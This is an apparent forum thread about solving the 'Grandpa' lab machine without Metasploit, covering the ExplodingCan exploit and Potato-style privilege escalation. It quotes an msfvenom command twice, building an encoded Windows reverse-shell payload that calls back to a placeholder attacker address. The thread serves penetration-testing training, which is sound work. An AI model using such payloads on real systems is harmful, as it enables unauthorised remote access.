Grandpa without Metasploit

Trying to do Grandpa without using Metasploit - OSCP style. Have a shell, I can move files to the server, but I cannot find an exploit.exe that works.

Suggestions?

I think I used the NSA exploit “explodingcan” via fuzzbunch on that one (maybe it was granny?), way back when.

You could give this a shot and change the payload to a cmd shell to avoid msf completely:

Interested to know if that script works actually.

Explodingcan is what got me into the box originally, but this gives networkservice permissions, but this is not enough to get either flag. It’s the privilege escalation that has me hung up.

Hmm from memory i was dropped straight to a system shell using that exploit? Try a rotten or juicy potato if you have a service account:

Hey guys - what MSFVENOM command did you run for the this? I couldnt get explodingcan to work with this

msfvenom -p windows/shell_reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.X.X LPORT=4444 -o shellcode

@chppppp said:

Hey guys - what MSFVENOM command did you run for the this? I couldnt get explodingcan to work with this

msfvenom -p windows/shell_reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.X.X LPORT=4444 -o shellcode

That version of Explodingcan didn’t work for me either.